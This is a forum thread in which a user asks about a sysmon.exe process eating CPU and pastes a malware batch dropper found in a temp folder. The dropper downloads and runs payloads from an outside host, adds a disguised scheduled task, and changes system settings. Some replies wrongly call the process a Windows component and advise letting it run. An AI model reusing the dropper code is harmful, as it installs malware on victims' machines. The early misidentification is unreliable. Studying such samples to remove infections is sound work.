Weird process using 50% of my cpu

[ciprian97pop]

Hello everyone

Today I noticed a weird process showing up in task manager, that's constantly consuming 45-50% of my cpu all the time

The process is called sysmon.exe and i'm aware of it since a few hours ago.

Everytime i kill the process it comes back.

It also creates the .exe in the appdata/temp folder 

I've searched online but i didn't find almost anything about it.

Also, I'm in the process of downloading an antivirus (used windows defender because i don't download or use suspicious stuff) 

I also thought that it might be some sort of coin miner but it wasn't using any internet

Here's a screenshot of it:

 

Also, here's the path to the file

 

UPDATE:

After some more digging, i found out that everytime, it creates a temp_XXXX folder (wher xxxx are random numbers) and in that folder it also creates 3 .bat files

The start.bat file is just running the build.bat file but here's what i found when i opened the build.bat file

 

At this point i'm 99% sure that this is some kind of coin miner/malware

Here comes the fun part

This is what i found when I opened the upd.bat file

<spoiler>

ping www.google.com -n 1 -w 1000
if %errorlevel% == 1 ( exit )
if not exist "%TEMP%\7za.exe" (
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. org/7za.exe -OutFile \"%TEMP%\7za.exe\""
)
if not exist "%TEMP%\ppuarchive4.zip" (
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31 fg1x2. org/packagenew_unsigned.zip -OutFile \"%TEMP%\ppuarchive4.zip\""
)
if not exist "%TEMP%\bcmuarchive12.zip" (
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. org/packagehwloc_unsigned.zip -OutFile \"%TEMP%\bcmuarchive12.zip\""
)
if not exist "%TEMP%\tmg.ps1" (
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. o rg/trackermagic.ps1 -OutFile \"%TEMP%\tmg.ps1\""
)
if not exist "%TEMP%\opokl.txt" (
    PowerShell -NoLogo -Command "Invoke-WebRequest -Uri http://31b4bd 31fg1x2 .o rg/svchostc_task.xml -OutFile \"%TEMP%\svctask.xml\""
    PowerShell -NoLogo -Command "(gc \"%TEMP%\svctask.xml\") -replace 'LOCALAPPDATA', '%LOCALAPPDATA%' | Out-File \"%TEMP%\svctask.xml\""
    schtasks /Create /xml "%TEMP%\svctask.xml" /tn "svchostc" /F
    del "%TEMP%\svctask.xml"
    echo a > "%TEMP%\opokl.txt"
)
if not exist "%LOCALAPPDATA%\WindowsDefenderTemp\update.vbs" (
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f  g1x2. o rg/batch bot.vbs -OutFile \"%TEMP%\batchbot.vbs\""
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg 1x2.or g/batchinstaller.bat -OutFile \"%TEMP%\batchinstaller.bat\""
    PowerShell -Command "Invok e-WebRequest -Uri http://31b4bd 31fg1x2.o rg/batchtask.xml -OutFile \"%TEMP%\batchtask.xml\""
    "%TEMP%\batchinstaller.bat" 
)
set list=FDBBBAD251AD958202EBB8D72746CEDC85DA45F2 8763B0C12D08BF29E40929B97A05D89721F8387D 4F4BA35DCA24DFA59E3CAADEA01C1094A1D0DB9F 39999E1648D457EC986B80CA2319C3B3E6B6C26B D0011BD12AA2D97084AC8D9E08FAA4C7307D616C EEFD9416DF1F743F26CD0B695C437626D951D752 FA58AD3904381B2E35CD233CD3DEFB13DB83FDC7 92B60DF728B47048D8354AB9C96ADCD60B25B01A 77E386B5AB1046DD872394DED2C93B312B93EAD1
(for %%a in (%list%) do ( 
    powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.leechers-paradise.org 6969 %%a 90
    powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.coppersurfer.tk 6969 %%a 90
    powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" exodus.desync.com 6969 %%a 90
))
powercfg /SETACVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0
powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0
powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\GraphicsDrivers" /v TdrDelay /t REG_SZ /d "8" /f
if not exist "%LOCALAPPDATA%\svc10.17134\d.txt" (
    "%TEMP%\7za.exe" x "%TEMP%\ppuarchive4.zip" -o"%~dp0" -y
    "%~dp0\packagenew\buildpassive.bat"
    echo d > "%LOCALAPPDATA%\svc10.17134\d.txt"
    rmdir /s /q "%~dp0\packagenew"
)
taskkill /f /im sysmon.exe
::tasklist /FI "IMAGENAME eq sysmon.exe" 2>NUL | find /I /N "sysmon.exe">NUL
::if "%ERRORLEVEL%"=="0" exit
"%TEMP%\7za.exe" x "%TEMP%\bcmuarchive12.zip" -o"%~dp0" -y
"%~dp0\packagehwloc\start.bat"
start /b "" cmd /c del "%~dp0\upd.bat"&exit /b

 

</spoiler>

 

Yeah, so it surely is a virus or some sort of malware

Could someone explain me what that code does? It would help alot

Also, any suggestions would be greatly appreciated.

 

Thank you

[Enderman]

https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon

It's part of windows.

[emosun]

1 minute ago, Enderman said:

t's part of windows.

that... really makes me not want to use windows 10 lol

[ciprian97pop]

2 minutes ago, Enderman said:

https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon

It's part of windows.

Are you sure? 

 

why would it need to consume that much cpu if it's just some event monitor

I also read that article but didn't thought much of it

[Enderman]

Just now, emosun said:

that... really makes me not want to use windows 10 lol

It's literally a part of the security to prevent malware...

If it's using 50% CPU then there some problem with the OS.

Usually in cases like these you can leave it for a few hours until it finishes whatever it's doing and then goes back to 0%, but sometimes stuff gets stuck if you try forcing it to terminate or other reasons.

[Syntaxvgm]

Its a system process but a little more jamaican

[ciprian97pop]

Thank you guys for your replies

I will stop killing the process and let it run hoping it will disappear soon.

Just hoping that i won't have the surprise of turning on my laptop tomorrow morning and finding everything encrypted

 

P.S.: Making a backup on google drive with my most important files just to be safe

[emosun]

2 minutes ago, Enderman said:

If it's using 50% CPU then there some problem with the OS.

i agree. so.... makes me not want to use windows 10 lol

honestly I have never seen a system process use 50% of my cpu power ever , I can't imagine what needs PROCESSING that much for just OS maintenance. I understand maybe the drive being busy moving files around or possibly the network downloading an update , but the cpu? is it folding proteins or something? lol

[Enderman]

Just now, emosun said:

i agree. so.... makes me not want to use windows 10 lol

honestly I have never seen a system process use 50% of my cpu power ever , I can't imagine what needs PROCESSING that much for just OS maintenance. I understand maybe the drive being busy moving files around or possibly the network downloading an update , but the cpu? is it folding proteins or something? lol

Background updates often take 50-100% CPU, there are plenty of things the OS does in the background, everything from OS changes, drivers, security scans, etc.

Maybe it's time for OP to do a clean install if it isn't going away on it's own or with restarts.

[emosun]

1 minute ago, Enderman said:

Background updates often take 50-100% CPU

wow that would really drive me nuts. lol

Again i'm not sure what would take that much cpu power. I can't help but feel they are just sneaking cpu usage in there to mine coins or something. I feel like if your cpu is spending 100% of it's power just trying to stay safe it almost negates having a computer. lol , a discussion for another time.

[Enderman]

Just now, emosun said:

wow that would really drive me nuts. lol

Again i'm not sure what would take that much cpu power. I can't help but feel they are just sneaking cpu usage in there to mine coins or something. I feel like if your cpu is spending 100% of it's power just trying to stay safe it almost negates having a computer. lol , a discussion for another time.

Usually it only lasts a few minutes or seconds though...

[ciprian97pop]

10 hours ago, Syntaxvgm said:

Its a system process but a little more jamaican

 

10 hours ago, Enderman said:

It's literally a part of the security to prevent malware...

If it's using 50% CPU then there some problem with the OS.

Usually in cases like these you can leave it for a few hours until it finishes whatever it's doing and then goes back to 0%, but sometimes stuff gets stuck if you try forcing it to terminate or other reasons.

 

10 hours ago, emosun said:

that... really makes me not want to use windows 10 lol

Hi again

 

So... yeah..

Today I installed malware-bytes and let's just say that that wasn't a windows event reporter

 

Again, thank you guys for your involvement 

[emosun]

it was sitting in the temp folder so yeah definitely not a real system process.

[Enderman]

9 hours ago, ciprian97pop said:

 

Again, thank you guys for your involvement 

Huh wow...

And it's gone now?

[ciprian97pop]

3 hours ago, Enderman said:

Huh wow...

And it's gone now?

Yep.

Malware-bytes got rid of it

I will keep doing some daily scans until next week just to be sure

[Enderman]

4 minutes ago, ciprian97pop said:

Yep.

Malware-bytes got rid of it

I will keep doing some daily scans until next week just to be sure

How did you even manage to get malware that bad...

[ciprian97pop]

13 hours ago, Enderman said:

How did you even manage to get malware that bad...

I... I really don't know.

It's more embarrassing as i work as a system administrator and I should be the one stopping things like this from happening.

If I think a bit, I might have gotten this a few days earlier when I did some data recovery for a company. They had a few bad drives that weren't recognized in windows so I used testdisk to recover some files. Maybe that was the moment in which I got that

[Enderman]

8 hours ago, ciprian97pop said:

I... I really don't know.

It's more embarrassing as i work as a system administrator and I should be the one stopping things like this from happening.

If I think a bit, I might have gotten this a few days earlier when I did some data recovery for a company. They had a few bad drives that weren't recognized in windows so I used testdisk to recover some files. Maybe that was the moment in which I got that

Welp, we both learnt something new today...

[minsomai]

I had the same trouble. Sysmon.exe using 50-60% process. It came with Visual Studio.

 

Here's what I did to get rid of it:

 

1. End Task the Sysmon.exe from the Task Manager (Didn't work, it pops up after some time and downloads loads of file in TEMP.)
2. Delete the files from the temp folder of Sysmon.exe (Didn't work, pops after some time. again)
3. By this time deleting files and searching in sites (no answer nowhere).
4. Thought there must be some process running in the background that does this. (Download Process Monitor and log the folder temp)
5. Found the culprit.
6. Here is the answer (Links to Superuser).

//SOLVED

If you don't want to visit Superuser.

 

The problem is with the secret process running. Go to details of task manager. And look for svchostc.exe not svchost.exe (notice extra 'c'?). Yeah, this process downloaded the bat file and started the whole mess. Go to its original location, delete it - end the process and DONE. Also, clean up the registry and delete the files from %temp% folder.